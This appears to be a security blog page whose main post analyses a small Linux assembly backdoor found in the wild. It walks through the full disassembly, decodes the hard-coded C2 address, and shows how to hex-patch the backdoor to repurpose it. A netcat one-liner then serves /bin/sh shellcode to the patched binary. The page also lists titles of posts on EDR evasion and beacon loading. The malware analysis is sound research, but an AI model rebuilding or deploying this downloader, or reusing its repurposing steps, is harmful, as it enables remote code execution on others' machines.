I’ve always been amazed by crowdsourced capabilities and their integration into toolsets. Some time ago Joe Vest kickstarted a Community Kit, a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike. These extensions are written by some of the smartest people in the industry and being able to leverage them into other C2s it’s undoubtedly a “must have” feature. Indeed, few days ago Moloch Added support for extensions/BOFs for the Sliver framework written in Go. The same capability could be leveraged with some effort on every C2 with Python-based agents and this post described one way to do it.

Repurposing a Linux Assembly backdoor caught in the wild

2020-04-13T00:00:00-04:00

This work is based on Aneesh Dogra’s blogpost describing a new small linux backdoor caught in the wild. The backdoor main functions are fairly explained in the blogpost, however I wanted to dig deeper and look under the hood to check how this backdoor can be repurposed. I thought this might also be a good opportunity to sharpen my assembler skills while exploring some interesting concepts. The backdoor essentially calls back to a C2 and downloads shellcode to be executed in the context of the current process.

As we are dealing with a 64 bit ELF, Linux x86_64 system calls use designated registers for the arguments. The registers for the x86_64 calling sequence are:

RAX -> system call number
RDI -> first argument
RSI -> second argument
RDX -> third argument
R10 -> fourth argument
R8 -> fifth argument
R9 -> sixth argument

Results after syscalls are placed into RAX register, so it’s handy to keep the syscall table from the linux kernel for mapping which syscall has been invoked in the assembly code. Syscalls are the interface between user programs and the Linux kernel. They are used to let the kernel perform various system tasks, such as file access, process management and networking. Now let’s get our hands dirty and reverse the most important functionalities of the backdoor that Aneesh kindly provided. Here is the full backdoor assembly with comments after my analysis:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
129: entry0 (int64_t arg3);
;
0x00400078      xor rdi, rdi
0x0040007b      push 9             
0x0040007d      pop rax
0x0040007e      cdq
0x0040007f      mov dh, 0x10       ; 16
0x00400081      mov rsi, rdx       ; arg3 ; 4096
0x00400084      xor r9, r9
0x00400087      push 0x22          ; 34
0x00400089      pop r10
0x0040008b      mov dl, 7
0x0040008d      syscall            ; mmap syscall
0x0040008f      test rax, rax
0x00400092      js 0x4000e6
0x00400094      push 0xa           ; 10
0x00400096      pop r9
0x00400098      push rsi           ; saves 4096 on the stack later use in read syscall
0x00400099      push rax           ; saves mmapped address on the stack later use in read syscall and shellcode execution
0x0040009a      push 0x29          ; 41
0x0040009c      pop rax
0x0040009d      cdq
0x0040009e      push 2             
0x004000a0      pop rdi
0x004000a1      push 1             
0x004000a3      pop rsi
0x004000a4      syscall            ; socket syscall
0x004000a6      test rax, rax
0x004000a9      js 0x4000e6        ; jump forward to exit block if socket unsuccessful
0x004000ab      xchg rax, rdi
0x004000ad      movabs rcx, 0xc2edf86839050002 ; gets here if socket successful or connect unsuccessful and after nanosleep
0x004000b7      push rcx           ; holds the connect addr structure
0x004000b8      mov rsi, rsp       ; pointer to the addr structure
0x004000bb      push 0x10          ; 16
0x004000bd      pop rdx
0x004000be      push 0x2a          ; 42
0x004000c0      pop rax
0x004000c1      syscall            ; connect syscall
0x004000c3      pop rcx
0x004000c4      test rax, rax
0x004000c7      jns 0x4000ee       ; jump to read and execute shellcode if connect successful
0x004000c9      dec r9
0x004000cc      je 0x4000e6        ; decrement 10 1 by 1 and compares it with -1 (connect returned error)
0x004000ce      push rdi
0x004000cf      push 0x23          ; 35
0x004000d1      pop rax
0x004000d2      push 0
0x004000d4      push 5             
0x004000d6      mov rdi, rsp
0x004000d9      xor rsi, rsi
0x004000dc      syscall            ; nanosleep syscall
0x004000de      pop rcx
0x004000df      pop rcx
0x004000e0      pop rdi
0x004000e1      test rax, rax
0x004000e4      jns 0x4000ad       ; jump back if connect failed or nanosleep encounters an error
0x004000e6      push 0x3c          ; gets here if socket unsuccessful or tried connecting 10 times or read failed or mmap failed
0x004000e8      pop rax
0x004000e9      push 1             
0x004000eb      pop rdi
0x004000ec      syscall            ; exit syscall
0x004000ee      pop rsi            ; gets here if connect successful, so RAX=0, rsi=mmapped address popped from the stack
0x004000ef      pop rdx            ; 4096 bytes to be read from connect file descriptor
0x004000f0      syscall            ; read syscall; rdi=connect file descriptor
0x004000f2      test rax, rax
0x004000f5      js 0x4000e6
0x004000f7      jmp rsi            ; execute the bytes read from the connect syscall (shellcode) in the memory mapped address space

Let’s start from the beginning by dividing the assembly in chunks with each syscall at the borders keeping in mind that the backdoor is connecting to a C2 and executing shellcode, so somewhere during the journey we should expect networking and memory related syscalls.

1
2
3
4
5
6
7
8
9
10
11
0x00400078      xor rdi, rdi
0x0040007b      push 9             
0x0040007d      pop rax
0x0040007e      cdq
0x0040007f      mov dh, 0x10       ; 16
0x00400081      mov rsi, rdx       ; arg3 ; 4096
0x00400084      xor r9, r9
0x00400087      push 0x22          ; 34
0x00400089      pop r10
0x0040008b      mov dl, 7
0x0040008d      syscall            ; mmap syscall

syscall number 9 is mapped to the mmap function. This is the mmap function declaration: void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); We should keep it in mind while poking around registers and understand how mmap is called. From the assembly we can understand the following:

*addr–> RDI=0
length –> RSI=0x1000 — 4096 minimum allocatable page size in 32-64 bit Linux
prot –> RDX= 0x1007 — PROT_READ - PROT_WRITE - PROT_EXEC - 0x1000
flags –> R10= 0x22 — MAP_PRIVATE - MAP_ANONYMOUS
fd –> r8=0
offset –> r9=0

To better understand its arguments let’s summon the mmap man page:

mmap() creates a new mapping in the virtual address space of the calling process. The starting address for the new mapping is specified in addr. The length argument specifies the length of the mapping (which must be greater than 0). If addr is NULL, then the kernel chooses the (page-aligned) address at which to create the mapping; this is the most portable method of creating a new mapping. If addr is not NULL, then the kernel takes it as a hint about where to place the mapping; on Linux, the kernel will pick a nearby page boundary (but always above or equal to the value specified by /proc sys/vm/mmap_min_addr) and attempt to create the mapping there. If another mapping already exists there, the kernel picks a new address that may or may not depend on the hint. The address of the new mapping is returned as the result of the call. The prot argument describes the desired memory protection of the mapping (and must not conflict with the open mode of the file).

For what we know we can see that here mmap is used by this tiny malware to allocate a larger memory region inside the target process’ address space, and page has been set as readable, writable and/or executable.

Here is the next assembly chunk to be analyzed:

1
2
3
4
5
6
7
8
9
10
11
12
0x00400094      push 0xa           ; 10
0x00400096      pop r9
0x00400098      push rsi           ; saves 4096 on the stack later use in read syscall
0x00400099      push rax           ; saves mmapped address on the stack later use in read syscall and shellcode execution
0x0040009a      push 0x29          ; 41
0x0040009c      pop rax
0x0040009d      cdq
0x0040009e      push 2             
0x004000a0      pop rdi
0x004000a1      push 1             
0x004000a3      pop rsi
0x004000a4      syscall            ; socket syscall

Syscall number 41 is related to the socket function and its declaration is int socket(int domain, int type, int protocol); As per the man page:

socket() creates an endpoint for communication and returns a file descriptor that refers to that endpoint. The file descriptor returned by a successful call will be the lowest-numbered file descriptor not currently open for the process. This code snippets creates an endpoint for a communication of type SOCK_STREAM, on the PF_INET domain and with IP protocol.

This one is pretty self-explanatory,now let’s dig onto the next chunk:

1
2
3
4
5
6
7
8
9
10
11
0x004000a6      test rax, rax
0x004000a9      js 0x4000e6        ; jump forward to exit block if socket unsuccessful
0x004000ab      xchg rax, rdi
0x004000ad      movabs rcx, 0xc2edf86839050002 ; gets here if socket successful or connect unsuccessful and after nanosleep
0x004000b7      push rcx           ; holds the connect addr structure
0x004000b8      mov rsi, rsp       ; pointer to the addr structure
0x004000bb      push 0x10          ; 16
0x004000bd      pop rdx
0x004000be      push 0x2a          ; 42
0x004000c0      pop rax
0x004000c1      syscall            ; connect syscall

The code sets up a syscall 42, calling the connect function that is declared this way int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen); within the RCX register is put the struct sockaddr that can be broken down in this way:

02 00 AF_INET
05 39 port 1337
68 f8 ed c2 IP 104.248.237.194

These are the IP address and port of the malware C2 to whom the backdoor is connecting.

Here is the next assembly snippet:

1
2
3
4
5
6
7
8
9
10
11
12
13
0x004000c3      pop rcx
0x004000c4      test rax, rax
0x004000c7      jns 0x4000ee       ; jump to read and execute shellcode if connect successful
0x004000c9      dec r9
0x004000cc      je 0x4000e6        ; decrement 10 1 by 1 and compares it with -1 (connect returned error)
0x004000ce      push rdi
0x004000cf      push 0x23          ; 35
0x004000d1      pop rax
0x004000d2      push 0
0x004000d4      push 5             
0x004000d6      mov rdi, rsp
0x004000d9      xor rsi, rsi
0x004000dc      syscall            ; nanosleep syscall

Syscall with argument 35 invokes the nanosleep function int nanosleep(const struct timespec *req, struct timespec *rem); that does the following

nanosleep() suspends the execution of the calling thread until either at least the time specified in *req has elapsed, or the delivery of a signal that triggers the invocation of a handler in the calling thread or that terminates the process. […] On successfully sleeping for the requested interval, nanosleep() returns 0. If the call is interrupted by a signal handler or encounters an error, then it returns -1, with errno set to indicate the error.

We are approaching the end of the backdoor and the magic is going to kick in. Here is the final assembly snippet:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0x004000de      pop rcx
0x004000df      pop rcx
0x004000e0      pop rdi
0x004000e1      test rax, rax
0x004000e4      jns 0x4000ad       ; jump back if connect failed or nanosleep encounters an error
0x004000e6      push 0x3c          ; gets here if socket unsuccessful or tried connecting 10 times or read failed or mmap failed
0x004000e8      pop rax
0x004000e9      push 1             
0x004000eb      pop rdi
0x004000ec      syscall            ; exit syscall
0x004000ee      pop rsi            ; gets here if connect successful, so RAX=0, rsi=mmapped address popped from the stack
0x004000ef      pop rdx            ; 4096 bytes to be read from connect file descriptor
0x004000f0      syscall            ; read syscall; rdi=connect file descriptor
0x004000f2      test rax, rax
0x004000f5      js 0x4000e6
0x004000f7      jmp rsi            ; execute the bytes read from the connect syscall (shellcode) in the memory mapped address space

This code block contains the exit syscall which is hit whenever other syscalls fail (mmap, connect, socket, read), and right after that, by using the memory mapped address saved on the stack as a buffer, the read syscall does exactly what it says: it reads bytes (max. 4096) from the file descriptor created with the connect syscall and place them in the buffer. Then if no error arises the execution is passed to the opcodes starting from the address saved in RSI register, that is the memory mapped address (marked as RWX) and the read buffer where we placed the shellcode received with the connect syscall. In other words this tiny 249 bytes backdoor can achieve in memory execution of an arbitrary remotely downloaded shellcode. There are no applied opsec features such as a decoding/decryption routine for the downloaded shellcode, custom ELF packer scheme etc. so the C2 software for the backdoor can be anything capable of transmitting predetermined shellcode via a network socket and anyone with a hex editor can change the sockaddr structure to modify the C2 IP and reuse the backdoor. Let’s try that and modify the contents of the connect syscall addr structure at the address 0x004000ad: Address 127.0.0.1 with port 1337 translates to 0x0100007f39050002, it is enough to use whatever hex editor like bless and patch the backdoor.

We are using a [/bin/sh shellcode]{http://shell-storm.org/shellcode/files/shellcode-806.php} for a local test:

1
2
python -c “print ‘\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05’” | nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)

finally firing up the patched backdoor:

1
2
3
root@remnux:/home/remnux/Desktop/backdoor# ./pay_patched.bin
# echo $0
/bin/sh

That’s it. Repurposed backdoor. Writing this post allowed me to better understand the logic flow of the backdoor that malware author(s) chose to use and linux in-memory shellcode execution.

Naksyn’s blog

Raising Beacons without UDRLs and Teaching them How to Sleep

Table of Contents

TL;DR

Intro

UDRL-less Beacon generation

UDRL-less Beacon loading

Hook Sleep and prototype stuff

PoC || GTFO #1

Memmory Bouncing

PoC || GTFO #2

Memory Hopping

PoC || GTFO #3

Outro

Mockingjay revisisted - Process stomping and loading beacon with sRDI

Table of Contents

TL;DR

Credits

Intro

Process Stomping

using sRDI to load a Beacon on an RWX process’ section

Putting it all together: sRDI — Reflective-Loaderless Beacon — Process Stomping

Outro

Improving the stealthiness of memory injections techniques

Table of Contents

TL;DR

Credits

Intro

Injection Categories

Code Injection

PE Injection

Process Manipulation

Improvement Strategy

Moving Parts - Injection technique

Moving Parts - Loader

Moving Parts - Payload

Testing with memory scanners

Starting Point - PythonMemoryModule

Module Overloading

Module Stomping

Module Shifting

Outro

Living-Off-the-Blindspot - Operating into EDRs’ blindspot

Table of Contents

TL;DR

Intro

EDRs Defenses

Kernel Callbacks and Usermode Hooking

Memory Scanning

ML based detections

IoCs and IoAs

Bypass Strategy

Main Categories of EDR Evasion operations

Operational constraints

Choosing a language

Leveraging Python

Execution Method

Dynamic in-memory import

Beacon Object File execution via shellcode

In-process C2 agent injection

Conclusions

How to defend from this

Running Cobalt Strike BOFs from Python

TL;DR

Intro

PoC || GTFO

Outro

Repurposing a Linux Assembly backdoor caught in the wild